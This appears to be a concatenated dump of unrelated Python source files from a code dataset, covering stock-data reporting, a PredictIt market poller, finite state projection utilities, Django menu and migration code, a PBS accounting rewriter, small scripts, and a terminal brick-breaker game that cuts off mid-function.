        profit_zz500_df = self.get_stock_profit_data(zz500_df)
        profit_df = pd.concat([profit_hs300_df, profit_zz500_df])
        # profit_df = profit_hs300_df
        time_str = datetime.now().strftime('%H%M%S')
        self.save2file(f'financial_zz800_{time_str}', profit_df)
        # self.save2file(f'financial_hs300_{time_str}', profit_hs300_df)
        # self.save2file(f'financial_zz500_{time_str}', profit_zz500_df)
    def get_stock_profit_data(self, df_stocks):
        """Populate ``df_stocks`` (indexed by code) with detail, report,
        broker-prediction, advance/express report and fund-holding columns.

        Mutates and returns the same DataFrame.
        """
        code_list = df_stocks.index.tolist()
        # Market snapshot (price, caps, pe/pb, eps, roe) per code.
        detail_dict = xueqiu_d.sync_stock_detail(code_list)
        for code in code_list:
            detail = detail_dict[code]
            df_stocks.loc[code, 'm_cap'] = detail['market_value']
            df_stocks.loc[code, 'f_cap'] = detail['float_market_capital']
            df_stocks.loc[code, 'pe_ttm'] = detail['pe_ttm']
            df_stocks.loc[code, 'pb'] = detail['pb']
            df_stocks.loc[code, 'eps'] = detail['eps']
            if detail['pb'] and detail['pe_ttm']:
                # roe_ttm derived from pb / pe_ttm.
                df_stocks.loc[code, 'roe_ttm'] = detail['pb'] / \
                    detail['pe_ttm']
            df_stocks.loc[code, 'price'] = detail['price']
            df_stocks.loc[code, 'roe'] = detail['roe']
        # Latest published financial report per code.
        report_dict = dongcai_d.sync_report(code_list)
        for code in code_list:
            report = report_dict[code]
            df_stocks.loc[code, 'update_date'] = pd.to_datetime(
                report['update_date'])
            df_stocks.loc[code, 'account_p'] = report['account_p']
            df_stocks.loc[code, 'account_date'] = report['account_date']
            df_stocks.loc[code, 'r_eps'] = report['eps']
            df_stocks.loc[code, 'r_kfeps'] = report['kf_eps']
        # Broker consensus forecasts (rating, eps/roe for -1/0/+1 years).
        predict_dict = dongcai_d.sync_broker_predict(code_list)
        for code in code_list:
            predict = predict_dict[code]
            df_stocks.loc[code, 'rate'] = float(predict['rate'])
            df_stocks.loc[code, 'p_year'] = predict['thisyear']
            df_stocks.loc[code, 'roe-1'] = predict['roe_list'][0]
            df_stocks.loc[code, 'p_roe'] = predict['roe_list'][1]
            df_stocks.loc[code, 'p_roe+1'] = predict['roe_list'][2]
            df_stocks.loc[code, 'eps-1'] = predict['eps_list'][0]
            if predict['eps_list'][1] and predict['eps_list'][0]:
                # Forecast profit YoY growth from the eps series.
                df_stocks.loc[code, 'p_proyoy'] = (
                    predict['eps_list'][1]-predict['eps_list'][0])/abs(
                    predict['eps_list'][0])
            df_stocks.loc[code, 'p_eps'] = predict['eps_list'][1]
            df_stocks.loc[code, 'p_eps+1'] = predict['eps_list'][2]
            # NOTE(review): ``detail`` here is the leftover variable from the
            # first loop (always the LAST code's detail), so peg is computed
            # with the wrong pe_ttm for every other code — looks like a bug;
            # probably should be detail_dict[code]. Verify before relying on
            # the 'peg' column.
            if predict['pro_grow_ratio'] and detail['pe_ttm'] and detail['pe_ttm'] > 0:
                df_stocks.loc[code, 'peg'] = detail['pe_ttm'] / \
                    predict['pro_grow_ratio']
            # if predict[2] is not None:
            #     df_stocks.loc[code,'year2'] = predict[2,'year']
            #     df_stocks.loc[code,'eps2'] = float(predict[2,'value'])
            #     df_stocks.loc[code,'ratio2'] = float(predict[2,'ratio'])
        req_info = [{'code': code,
                     'last_report_date': datetime.fromisoformat(
                         df_stocks.loc[code, 'account_date'])
                     } for code in code_list]
        # Advance (preliminary) report flags.
        adv_dict = dongcai_d.sync_advance_report(req_info)
        for code in code_list:
            adv = adv_dict[code]
            if adv:
                df_stocks.loc[code, 'adv_date'] = pd.to_datetime(
                    adv['release_date'])
                df_stocks.loc[code, 'is_adv'] = 'Y'
        # Express (flash) report data.
        expr_dict = dongcai_d.sync_express_report(req_info)
        for code in code_list:
            expr = expr_dict[code]
            if expr:
                df_stocks.loc[code, 'expr_date'] = pd.to_datetime(
                    expr['release_date'])
                df_stocks.loc[code, 'expr_period'] = expr['expr_period']
                df_stocks.loc[code, 'expr_eps'] = expr['eps']
        # Per-stock eastmoney detail-page URL.
        for code in code_list:
            url_format = 'https://data.eastmoney.com/stockdata/{}.html'
            df_stocks.loc[code, 'url'] = url_format.format(
                code_formatter.code2code_without_char(code))
        # Fund holding percentages for the last two quarters plus delta.
        fund_hold_dict = dongcai_d.sync_fund_holding(code_list)
        for code in code_list:
            fund_hold = fund_hold_dict[code]
            df_stocks.loc[code, 'f_hold'] = fund_hold['last_quarter']
            df_stocks.loc[code, 'f_last'] = fund_hold['last_2quarter']
            if fund_hold['last_quarter'] and fund_hold['last_2quarter']:
                df_stocks.loc[code, 'f_chg'] = fund_hold['last_quarter'] - \
                    fund_hold['last_2quarter']
            else:
                df_stocks.loc[code, 'f_chg'] = None
        return df_stocks
    def save2file(self, filename, df):
        """Write the selected columns of ``df`` to a formatted xlsx file under
        ./raw_data/<date>/ (directory created on demand)."""
        folder_name = datetime.now().strftime('%Y%b%d')
        if not os.path.exists(f'./raw_data/{folder_name}'):
            os.mkdir(f'./raw_data/{folder_name}')
        # Column order defines the sheet layout referenced by the formats below.
        df = df[['code_name', 'industry', 'pe_ttm', 'pb', 'peg', 'price',
                 'm_cap', 'f_cap', 'f_hold', 'f_last', 'f_chg',
                 'rate', 'update_date', 'account_p', 'r_eps', 'r_kfeps',
                 'p_year', 'eps-1', 'p_eps', 'p_eps+1',
                 'roe-1', 'roe_ttm', 'p_roe', 'p_roe+1',
                 'expr_date', 'expr_period', 'expr_eps', 'adv_date', 'url']]
        # NOTE(review): the literal '(unknown)' in this path looks like a
        # redacted f-string field (probably {filename}) — the ``filename``
        # parameter is otherwise unused; verify.
        writer = pd.ExcelWriter(f'./raw_data/{folder_name}/(unknown).xlsx',
                                datetime_format='yyyy-mm-dd',
                                engine='xlsxwriter',
                                options={'remove_timezone': True})
        # Convert the dataframe to an XlsxWriter Excel object.
        df.to_excel(writer, encoding="gbk", sheet_name='Sheet1')
        # Get the xlsxwriter workbook and worksheet objects.
        workbook = writer.book
        worksheet = writer.sheets['Sheet1']
        # Add some cell formats.
        # format1 = workbook.add_format({'num_format': 'yyyy-mm-dd'})
        format1 = workbook.add_format({'num_format': '0.00'})
        format2 = workbook.add_format({'num_format': '0.00%'})
        # row_format = workbook.add_format({'bg_color': 'green'})
        # Note: It isn't possible to format any cells that already have a format such
        # as the index or headers or any cells that contain dates or datetimes.
        # Set the format but not the column width.
        # worksheet.set_column('E:E', None, format1)
        worksheet.set_column('D:I', None, format1)
        worksheet.set_column('J:L', None, format2)
        worksheet.set_column('P:Q', None, format1)
        worksheet.set_column('S:U', None, format1)
        worksheet.set_column('V:Y', None, format2)
        # worksheet.set_row(0, None, row_format)
        # Freeze the first row.
        worksheet.freeze_panes(1, 3)
        # Close the Pandas Excel writer and output the Excel file.
        writer.save()
# Module-level singleton so importers can reuse one StockProfit instance.
profit = StockProfit()

if __name__ == '__main__':
    profit.generate_report()
|
10,557 | 7583811dfce69089e6c2e6e80da21eb4a61704ca | #!/usr/bin/env Python3
import requests
import json
import datetime
import time
from pymongo import MongoClient
# Poll the PredictIt market API forever, storing changed contract snapshots
# into the local MongoDB collection predictit_data.historical.
client = MongoClient()
db = client.predictit_data
hist = db.historical
url = "https://www.predictit.org/api/marketdata/all/"
# Last snapshot seen per contract name, used to detect changes.
prev_entries = {}
while(True):
    start = datetime.datetime.now()
    try:
        ret = requests.get(url, timeout = 10).text
    except Exception:
        # On any request failure, back off for 30 minutes before retrying.
        print("Timeout")
        time.sleep(1800)
        continue
    for market in json.loads(ret)["Markets"]:
        for contract in market["Contracts"]:
            entry = { "name" : contract["LongName"],
                      "LastTradePrice" : contract["LastTradePrice"],
                      "BestBuyYesCost" : contract["BestBuyYesCost"],
                      "BestBuyNoCost" : contract["BestBuyNoCost"],
                      "BestSellYesCost" : contract["BestSellYesCost"],
                      "BestSellNoCost" : contract["BestSellNoCost"],
                      "LastClosePrice" : contract["LastClosePrice"],
                      "Time" : str(datetime.datetime.now())
                    }
            # NOTE(review): "Time" differs on every poll, so entry !=
            # prev_entries[...] is effectively always true after the first
            # cycle — this likely inserts every snapshot, not just changes.
            if (entry["name"] in prev_entries and entry != prev_entries[entry["name"]]):
                post_id = hist.insert_one(entry)
            prev_entries[entry["name"]]= entry
    finish = datetime.datetime.now()
    print("Data Collected at %s" % str(finish) )
    # Throttle to at most one poll every 30 seconds.
    time_elapsed = (finish-start).total_seconds()
    if(time_elapsed < 30):
        time.sleep(30-time_elapsed)
10,558 | 551f7b26d083a3fe3ad353e76a6c248d2dba1a97 | """
Common utility routines for Finite State Projection.
"""
import operator
import numpy
from cmepy.cme_matrix import non_neg_states
from cmepy import lexarrayset
def maxproppercent(propensities, percent_prop):
    """Return the maximum propensity scaled by ``percent_prop``.

    Idiom fix: replaces a hand-rolled linear maximum scan and an
    ``operator.mul`` call with the builtin ``max`` and plain multiplication.
    ``percent_prop`` is coerced to float exactly as before.

    Args:
        propensities: non-empty sequence of numeric propensity values.
        percent_prop: scaling factor (anything ``float()`` accepts).

    Returns:
        ``max(propensities) * float(percent_prop)``.
    """
    return max(propensities) * float(percent_prop)
def ignorereaction(propensities, newarray):
    """Drop propensities below 20.03 (in place) and truncate ``newarray``.

    Bug fix: the original removed items from ``propensities`` while iterating
    over the same list, which skips the element immediately following each
    removal, so some sub-threshold values survived. Filtering into a new
    list and slice-assigning back removes every sub-threshold entry while
    still mutating the caller's list in place, as before.

    Args:
        propensities: mutable list of propensity values; filtered in place.
        newarray: sequence of transitions; one trailing entry is dropped per
            removed propensity.

    Returns:
        ``newarray`` truncated by the number of removed propensities.
    """
    Oldlength = len(propensities)
    # Keep only propensities at or above the hard-coded threshold.
    propensities[:] = [p for p in propensities if p >= 20.03]
    k = Oldlength - len(propensities)
    truncated_new_transitions = newarray[: len(newarray) - k]
    return truncated_new_transitions
def grow_domain(domain_states, transitions, depth, validity_test = None):
    """
    Returns domain_states grown by depth along transitions.
    Resulting states are filtered by the validity_test. By default,
    only states without a negative coordinate are valid.

    Note: this module targets Python 2 (uses ``xrange``); ``domain_states``
    is a lexarrayset-style 2-D state array (states as columns).
    """
    if numpy.size(domain_states) == 0:
        raise ValueError('there must be at least one state to expand')
    if validity_test is None:
        validity_test = non_neg_states
    expanded_states = domain_states
    for _ in xrange(depth):
        # expand support states by one along each state transition
        for transition in transitions:
            level_states = domain_states
            # expand support states by transition upto bound limit
            for _ in xrange(3):
                new_level_states = lexarrayset.shift(level_states, transition)
                # Discard shifted states that fail the validity predicate
                # (by default, any state with a negative coordinate).
                valid = validity_test(new_level_states)
                new_level_states = new_level_states[:, valid]
                expanded_states = lexarrayset.union(
                    expanded_states,
                    new_level_states
                )
                level_states = expanded_states
            domain_states = level_states
    return expanded_states
"""
def ignorereaction(propensities, newarray, percent):
max_propensity = max(propensities)
Oldlength = len(propensities)
for i in propensities:
if i < (max_propensity * percent):
propensities.remove(i)
Newlength = len(propensities)
k = Oldlength - Newlength
truncated_new_transitions = newarray[: len(newarray) - k]
return truncated_new_transitions
"""
"""
def reorder(propensities, transitions, no_of_reactions):
mapping = {k: i for i, k in enumerate(sorted(propensities, reverse=True))}
new_index = ([mapping[i] for i in propensities])
for i in xrange(0,no_of_reactions):
while (new_index[i] != i):
oldTargetI = new_index[new_index[i]]
oldTargetE = transitions[new_index[i]]
transitions[new_index[i]] = (transitions[i])
new_index[new_index[i]] = (new_index[i])
new_index[i] = oldTargetI
transitions[i] = oldTargetE
newarray = []
for i in xrange(0, no_of_reactions):
newarray.append(transitions[i])
#print newarray
newindex = []
for i in xrange(0, no_of_reactions):
newindex.append(new_index[i])
#print newindex
return newarray
"""
"""
def maxpropval(propensities):
maxVal = propensities[0]
for i in range(0, len(propensities), 1):
if maxVal < propensities[i]:
maxVal = propensities[i]
return maxVal
def maxproppercent(propensities, percent_prop):
max_val = maxpropval(propensities)
percent_propen = int(percent_prop)
max_propensity = operator.__mul__(max_val, percent_propen)
return max_propensity
def ignorereaction(propensities, newarray, percent_prop):
Oldlength = len(propensities)
max_propensity = maxproppercent(propensities, percent_prop)
for i in propensities:
if i < (max_propensity):
propensities.remove(i)
Newlength = len(propensities)
k = Oldlength - Newlength
truncated_new_transitions = newarray[: len(newarray) - k]
return truncated_new_transitions
""" |
10,559 | eb51106cf41d32e8961d7a339a0b4b6440e265fb | from django.urls import reverse
from menu import Menu, MenuItem
# Register the presentation-manager entries plus login/logout in the "main"
# menu; each item's ``check`` controls visibility per request.
Menu.add_item(
    "main",
    MenuItem(
        "Add presentation",
        reverse("presentation-manager:presentation-add"),
        weight=1000,
        check=lambda request: request.user.is_authenticated
        and request.user.has_perm("presentation_manager.add_presentation"),
    ),
)

Menu.add_item(
    "main",
    MenuItem(
        "List presentations",
        reverse("presentation-manager:presentation-list"),
        weight=1000,
        check=lambda request: request.user.is_authenticated
        and request.user.has_perm("presentation_manager.view_presentation"),
    ),
)

# Login is only shown to anonymous users; logout only to authenticated ones.
Menu.add_item(
    "main",
    MenuItem(
        "Login",
        reverse("login"),
        weight=1000,
        check=lambda request: not request.user.is_authenticated,
    ),
)

Menu.add_item(
    "main",
    MenuItem(
        "Logout",
        reverse("logout"),
        weight=1000,
        check=lambda request: request.user.is_authenticated,
    ),
)
10,560 | c926e3500c2606a42c4745dbd26121af31a7a210 | import pandas as pd
from sys import argv
import os
import glob
import datetime
#The goal is to replace the Resource_List.wall_time from current accounting file
# with the newly predicted value from the model
# The argument has the following order:
# 1. Full path of parsed CSV accounting file
# 2. Directory of input accounting files
# 3. Directory location of output accounting files
def read_into_txt():
    """Rewrite PBS accounting files with corrected walltimes.

    Reads every file under argv[2]; for each 'E' (job end) record of a
    non-array job, replaces Resource_List.walltime with the predicted value
    from ``mapModified`` (keyed by entity, qtime, session) and writes the
    result to argv[3]/<same basename>. Non-'E' lines pass through unchanged.
    """
    dest = argv[2]
    content = []
    statusArray = ["Q", "S", "B", "E"]
    files = glob.glob(dest + "/*")
    for f in files:
        with open(f, "r") as infile:
            parsedDate = f.split('/')
            # Output file shares the input file's basename.
            output_File = open(argv[3] + parsedDate[-1], 'w')
            data = infile.readlines()
            for line in data:
                # Accounting record lines start with a date and carry the
                # record type ('E' = end) as the second ';'-field.
                if ((line.split("/")[0].isdigit()) and (line.split(";")[1] == "E")):
                    element = line.split(' ')
                    sessionName = 0
                    qtime = 0
                    wallTimeLoc = 0
                    entity = element[1].split(';')[2].split('.')[0]
                    # '[' marks array jobs, which are skipped entirely.
                    if not ('[' in entity):
                        for i in range(0,len(element)):
                            if ('session' in element[i]):
                                sessionName = int(element[i].split('=')[1])
                            elif ('qtime' in element[i]):
                                qtime = int(element[i].split('=')[1])
                            elif ('Resource_List.walltime' in element[i]):
                                wallTimeLoc = i
                        # Substitute the model-predicted walltime when known.
                        if (((int(entity), qtime, sessionName) in mapModified.keys())):
                            element[wallTimeLoc] = 'Resource_List.walltime=' + str(mapModified[(int(entity), qtime, sessionName)])
                        writeLine = ' '.join(element)
                        output_File.write(writeLine)
                else:
                    output_File.write(line)
# Entity, qtime and session help define distinct submitted jobs
# CSV columns read from the parsed accounting file (argv[1]).
fields = ['Entity', 'qtime', 'session', 'Modified Resource_List.walltime']
# (entity, qtime, session) -> corrected walltime (timedelta); filled by main().
mapModified = {}
def main():
    """Load the corrected walltimes from the CSV at argv[1] into
    ``mapModified``, then rewrite the accounting files."""
    df = pd.read_csv(argv[1], usecols=fields)
    entityArr = df['Entity'].values
    qtimeArr = df['qtime'].values
    sessionArr = df['session'].values
    wallTimeArr = df['Modified Resource_List.walltime'].values
    for i in range (len(wallTimeArr)):
        # Walltimes are stored as seconds; convert to timedelta for printing.
        correctedTime = datetime.timedelta(0, wallTimeArr[i])
        mapModified[entityArr[i], qtimeArr[i], sessionArr[i]] = correctedTime
    read_into_txt()

if __name__ == "__main__":
    main()
10,561 | ced72b9c3b44cd035591a3e6adc05fd33931da42 | import random
import uuid
from temperatures import models
import datetime
from django.utils import timezone
# Seed script: create one dummy device and 3600 random temperature readings,
# one per minute, walking backwards from now.
first = timezone.now()
offset = datetime.timedelta(minutes=1)
DUMMY_UUID = uuid.UUID('12345678123456781234567812345678')
dades = 3600
device, _ = models.Device.objects.get_or_create(identifier=DUMMY_UUID)
for i in range(0, dades):
    # Random temperature in a plausible 0-40 degree range.
    temp = random.randint(0, 40)
    models.Temperature.objects.create(temperature=temp, device=device, datetime=first)
    first = first - offset
10,562 | f7749518ddcbffa5dce9f04a1ae1f54e4f191019 | print "How my order cost?"
print "Cell phones 2 * Nokia 101 - 2 * 274 = ", 2 * 274
|
10,563 | aaa9c50d93f46972d402a9979ba19b3231fecf0e | # -*- coding: utf-8 -*-
# Generated by Django 1.11.26 on 2020-01-20 22:54
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration: creates the SQLHqDeploy model backed
    # by the existing 'hqadmin_hqdeploy' table, mirroring the legacy couch
    # HqDeploy document (couch_id keeps the link to the couch record).

    dependencies = [
        ('hqadmin', '0009_auto_20170315_1322'),
    ]

    operations = [
        migrations.CreateModel(
            name='SQLHqDeploy',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Callable default: evaluated at row-creation time.
                ('date', models.DateTimeField(db_index=True, default=datetime.datetime.utcnow)),
                ('user', models.CharField(max_length=100)),
                ('environment', models.CharField(max_length=100)),
                ('diff_url', models.CharField(max_length=126, null=True)),
                ('couch_id', models.CharField(db_index=True, max_length=126, null=True)),
            ],
            options={
                'db_table': 'hqadmin_hqdeploy',
            },
        ),
    ]
|
10,564 | a1e2cbfe73c8889bca05dd05a02ef1789bb61a68 | def sumDigits(n):
result = 0
while(n != 0):
result += n % 10
n //= 10
return result
def main():
    """Prompt for an integer and print the sum of its digits."""
    n = int(input('Enter a number between 0 and 1000 : '))
    result = sumDigits(n)
    print('The sum of the digits is', result)

if __name__ == "__main__":
    main()
10,565 | 5b0758ad1120b5d44e35e3c37a150ecc4e9fcd57 | """Defining input class."""
import sys
import termios
import tty
import signal
import os
import time
import random
import numpy as np
from config import *
from screen import *
from brick import *
from paddle import *
from ball import *
from powerup import *
from bullet import *
from input import *
class Game:
    def __init__(self, lives, score, lvl):
        """Set up one level: brick grid (or boss UFO on the final level),
        hidden powerups, paddle and the initial stuck ball.

        Args:
            lives: remaining lives carried over from the previous level.
            score: running score carried over.
            lvl: current level number; lvl == lvlnum is the boss level.
        """
        self.__input = KBHit()
        self.__screen = Screen()
        self.__start = time.time()
        if(lvl != lvlnum):
            # Bricks per row; spacing widens on earlier levels.
            self.__brickCtr = (int)((cols - 4) / (3 * (lvlnum - lvl)))
        self.__bricks = []
        self.__powers = []
        self.__explode = []
        self.__bullets = []
        self.__bombs = []
        self.__lifeRec = True
        self.__moveBr = 0
        self.__spawn = False
        self.__lives = lives
        self.__score = score
        self.__lvl = lvl
        # np.empty((6, self.__brickCtr))
        # Build a 6-row brick grid with diagonal unbreakable/exploding bands;
        # skipped entirely on the boss level.
        for i in range(0, 6):
            if(self.__lvl == lvlnum):
                break
            self.__bricks.append([])
            for j in range(0, self.__brickCtr):
                if(i == j):
                    self.__bricks[i].append(Brick(1, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
                    # placing unbreakable bricks
                elif(self.__brickCtr - 1 - j == i):
                    self.__bricks[i].append(Brick(1, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
                    # placing unbreakable bricks
                elif(i == j - 1):
                    self.__bricks[i].append(Brick(2, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
                    # placing exploding bricks
                elif(self.__brickCtr - 2 - j == i):
                    self.__bricks[i].append(Brick(2, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
                    # placing exploding bricks
                elif(j == (int)(self.__brickCtr / 2)):
                    self.__bricks[i].append(Brick(0, [2 + i, 2 + 3 * (lvlnum - lvl) * j], True))
                else:
                    self.__bricks[i].append(Brick(0, [2 + i, 2 + 3 * (lvlnum - lvl) * j]))
                    # placing normal bricks
        # placing powerups
        #NOTE: Always append padShoot after padExpand and padShrink for shape purposes
        if(lvl != lvlnum):
            self.__powers.append(padExpand(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
            self.__powers.append(padShrink(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
            self.__powers.append(ballMul(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
            self.__powers.append(ballFast(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
            self.__powers.append(ballThru(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
            self.__powers.append(padGrab(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
            self.__powers.append(padShoot(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
            self.__powers.append(ballFire(self.__bricks[random.randint(0, 5)][random.randint(0, self.__brickCtr - 1)].getPos()))
        if(self.__lvl == lvlnum):
            # Boss level: a single type-3 (UFO) brick centered at the top.
            self.__bricks.append([])
            self.__bricks[0].append(Brick(3, [1, (int)(cols / 2) - 4]))
        self.__paddle = Paddle([rows - 2, (int)(cols / 2) - 2])
        # Ball starts resting on the middle of the paddle.
        self.__balls = [Ball([self.__paddle.getPos()[0] - 1, self.__paddle.getPos()[1] + (int)(self.__paddle.getDim()[1] / 2)])]
        self.__ballCtr = 1
    def spawnBricks(self, ufo):
        """Boss attack: fill three full rows of normal bricks directly below
        the UFO, replacing any previous spawned rows."""
        for i in range(1, 3 + 1):
            # Reuse the row slot if it exists, otherwise append a new one.
            if(len(self.__bricks) > i):
                self.__bricks[i] = []
            else:
                self.__bricks.append([])
            for j in range(0, cols - 3, 3):
                self.__bricks[i].append(Brick(0, [ufo.getPos()[0] + ufo.getDim()[0] + i - 1, j]))
                # placing normal bricks
def findPup(self, type):
for x in self.__powers:
if(x.getType() == type):
return x
    def bossMove(self):
        """Make the boss UFO (brick type 3) track the paddle horizontally,
        moving one column per call toward the paddle's side."""
        ufo = self.__bricks[0][0]
        pad = self.__paddle
        if(ufo.getType() != 3):
            return
        ufoMid = (int)(ufo.getPos()[1] + ufo.getDim()[1] / 2)
        if(pad.getPos()[1] + pad.getDim()[1] - 1 < ufoMid):
            # Paddle is fully left of the UFO's center: step left.
            ufo.setVel([0, -1])
            ufo.move()
            ufo.setVel([0, 0])
        elif(pad.getPos()[1] > ufoMid):
            # Paddle is fully right of the UFO's center: step right.
            ufo.setVel([0, 1])
            ufo.move()
            ufo.setVel([0, 0])
    def handle_input(self, txt):
        """Dispatch one keypress: a/d move the paddle, space releases the
        ball, n skips the level (returns True), q quits the program."""
        if(txt == 'a' or txt == 'A'):
            self.__paddle.keybrd(1, self.__balls)
        elif(txt == 'd' or txt == 'D'):
            self.__paddle.keybrd(0, self.__balls)
        elif(txt == ' '):
            self.__paddle.release(self.__balls)
            # After the first release, the life-start grace period is over.
            self.__lifeRec = False
            # Unless the grab powerup (type 6) is active, the paddle stops
            # sticking to the ball.
            retPow = self.findPup(6)
            if(retPow and retPow.getTime() == -1):
                self.__paddle.setStick(False)
        if(txt == 'n' or txt == 'N'):
            return True
        elif(txt == 'q'):
            # Restore the cursor before exiting.
            print("\033[?25h")
            quit()
def verticalCol(self, pos1, pos2, dim1, dim2, fix=False):
if(set(range(pos1[0], pos1[0] + dim1[0])) & set(range(pos2[0], pos2[0] + dim2[0]))):
if(fix and set(range(pos1[1], pos1[1] + dim1[1])) & set(range(pos2[1], pos2[1] + dim2[1]))):
return True
else:
return False
return True
    def findBrickByPos(self, pos):
        """Return the active brick whose position equals ``pos``; None if the
        brick at that position is inactive (falls through to None implicitly
        when no brick matches at all)."""
        for m in range(0, len(self.__bricks)):
            for n in range(0, len(self.__bricks[m])):
                if(self.__bricks[m][n].getPos() == pos):
                    if(not self.__bricks[m][n].getActive()):
                        return None
                    return self.__bricks[m][n]
    def findBricks(self, brick, fire=False):
        """Queue the 8 neighbours of ``brick`` for explosion.

        Only acts when the brick is an exploding brick (type 2) or the hit
        came from a fire ball; found neighbours go into self.__explode.
        """
        posit = brick.getPos()
        dim = brick.getDim()
        if(brick.getType() == 2 or fire):
            # Scan the 3x3 grid of brick-sized cells centred on this brick.
            for a in range(posit[0] - 1 * dim[0], posit[0] + 2 * dim[0], dim[0]):
                for b in range(posit[1] - 1 * dim[1], posit[1] + 2 * dim[1], dim[1]):
                    if(a == posit[0] and b == posit[1]):
                        continue
                    ret = self.findBrickByPos([a, b])
                    if(ret != None):
                        self.__explode.append(ret)
    def explosion(self):
        """Process the current explosion queue: chain-detonate neighbours,
        destroy each queued brick, award points, and drop any powerup hidden
        at that brick's position."""
        # Only the bricks queued so far are processed this pass; neighbours
        # appended by findBricks below are handled on the next call.
        length = len(self.__explode)
        for z in range(0, length):
            self.findBricks(self.__explode[z])
            self.__explode[z].collide(True)
            self.__score += points
            for k in range(0, len(self.__powers)):
                if(self.__powers[k].getPos() == self.__explode[z].getPos() and not self.__powers[k].getActive()):
                    self.__powers[k].activate(self.__powers[k].getPos())
                    self.__powers[k].setVel([-2, 0])
        # Remove exactly the entries processed this pass from the queue head.
        for z in range(0, length):
            del self.__explode[0]
def colChck(self, pos1, dim1, pos2, dim2):
if(set(range(pos1[0], pos1[0] + dim1[0])) & set(range(pos2[0], pos2[0] + dim2[0]))):
if(set(range(pos1[1], pos1[1] + dim1[1])) & set(range(pos2[1], pos2[1] + dim2[1]))):
return True
return False
    def collision(self, obj, flags):
        # obj always moving obj such as ball or powerup
        # flags[0] --> paddle interaction type, flags[1] --> brick interaction type
        #
        # Sweeps obj's next move cell-by-cell along its velocity vector and
        # resolves the first paddle or brick contact found.
        # flags[0]==1: bounce off the paddle; flags[0]==2: report paddle hit
        # (return 1). flags[1]==1: ball-vs-brick (damage + bounce);
        # flags[1]==2: report brick hit (return True).
        # NOTE(review): indentation of the brick-damage section was
        # reconstructed; verify the flags[1]==2 path against the original.
        p1 = np.array(obj.getPos()[:])
        v1 = np.array(obj.getVel()[:])
        dim1 = obj.getDim()[:]
        # Per-axis step direction (+1/-1) for the sweep.
        sign = [1, 1]
        if(v1[0]):
            sign[0] = (int)(v1[0] / abs(v1[0]))
        if(v1[1]):
            sign[1] = (int)(v1[1] / abs(v1[1]))
        for r in range(0, abs(v1[0]) + 1):
            for c in range(0, abs(v1[1]) + 1):
                cr = p1[0] + r * sign[0]
                cc = p1[1] + c * sign[1]
                pos1 = [cr, cc]
                # Skip the object's current cell.
                if(cr == p1[0] and cc == p1[1]):
                    continue
                if(flags[0] == 1):
                    pos2 = np.array(self.__paddle.getPos()) + np.array(self.__paddle.getVel())
                    dim2 = self.__paddle.getDim()
                    if(self.colChck(pos1, dim1, pos2, dim2)):
                        if(self.verticalCol(obj.getPos(), self.__paddle.getPos(), dim1, dim2)):
                            self.__paddle.collide(obj)
                            # Vertical bounce off the paddle.
                            obj.collide([-1 * obj.getVel()[0], obj.getVel()[1]])
                            # Past the time limit, each paddle hit advances
                            # the brick wall one row.
                            if(time.time() - self.__start >= timeLim):
                                self.__moveBr += 1
                            return
                elif(flags[0] == 2):
                    pos2 = np.array(self.__paddle.getPos()) + np.array(self.__paddle.getVel())
                    dim2 = self.__paddle.getDim()
                    if(self.colChck(pos1, dim1, pos2, dim2)):
                        if(self.verticalCol(obj.getPos(), self.__paddle.getPos(), dim1, dim2)):
                            return 1
                if(flags[1]):
                    for i in range(0, len(self.__bricks)):
                        for j in range(0, len(self.__bricks[i])):
                            if(not self.__bricks[i][j].getActive()):
                                continue
                            pos2 = np.array(self.__bricks[i][j].getPos()) + np.array(self.__bricks[i][j].getVel())
                            dim2 = self.__bricks[i][j].getDim()
                            if(self.colChck(pos1, dim1, pos2, dim2)):
                                thru = False
                                fire = False
                                if(flags[1] == 1):
                                    # Ball-specific modifiers.
                                    thru = obj.getThru()
                                    fire = obj.getFire()
                                # Chain-queue neighbours, then damage the brick.
                                self.findBricks(self.__bricks[i][j], fire)
                                self.__bricks[i][j].collide(thru, fire)
                                btype = self.__bricks[i][j].getType()
                                blife = self.__bricks[i][j].getLife()
                                # Boss brick spawns defensive rows at set HP.
                                if(btype == 3 and (blife == spawn1 or blife == spawn2)):
                                    self.__spawn = True
                                if(not self.__bricks[i][j].getActive()):
                                    self.__score += points
                                    if(self.__bricks[i][j].getType() == 3):
                                        self.__score += 100 * points
                                    # Release any powerup hidden in this brick.
                                    for k in range(0, len(self.__powers)):
                                        if(self.__powers[k].getPos() == self.__bricks[i][j].getPos() and not self.__powers[k].getActive()):
                                            self.__powers[k].activate(self.__powers[k].getPos())
                                            self.__powers[k].setVel(obj.getVel())
                                # Thru/fire balls pass through without bouncing.
                                if(thru or fire):
                                    continue
                                if(flags[1] == 2):
                                    return True
                                elif(self.verticalCol(obj.getPos(), self.__bricks[i][j].getPos(), dim1, dim2, self.__bricks[i][j].getType() == 3)):
                                    obj.collide([-1 * obj.getVel()[0], obj.getVel()[1]])
                                    return
                                else:
                                    obj.collide([obj.getVel()[0], -1 * obj.getVel()[1]])
                                    return
        return 0
    def activation(self):
        """Re-apply the effect of every currently running powerup each frame
        (ball-multiply, type 3, applies once on pickup so it is skipped)."""
        for i in range(0, len(self.__powers)):
            if(self.__powers[i].getTime() != -1):
                if(self.__powers[i].getType() == 3):
                    continue
                self.__powers[i].power(self.__paddle, self.__balls)
    def reset(self):
        """Restore paddle and ball defaults each frame before powerup effects
        are re-applied by activation()."""
        self.__paddle.setColor([font['black'], bg['white']])
        self.__paddle.setShape(listify(" " * padLen))
        # Keep the stick behaviour during the life-start grace period.
        if(not self.__lifeRec):
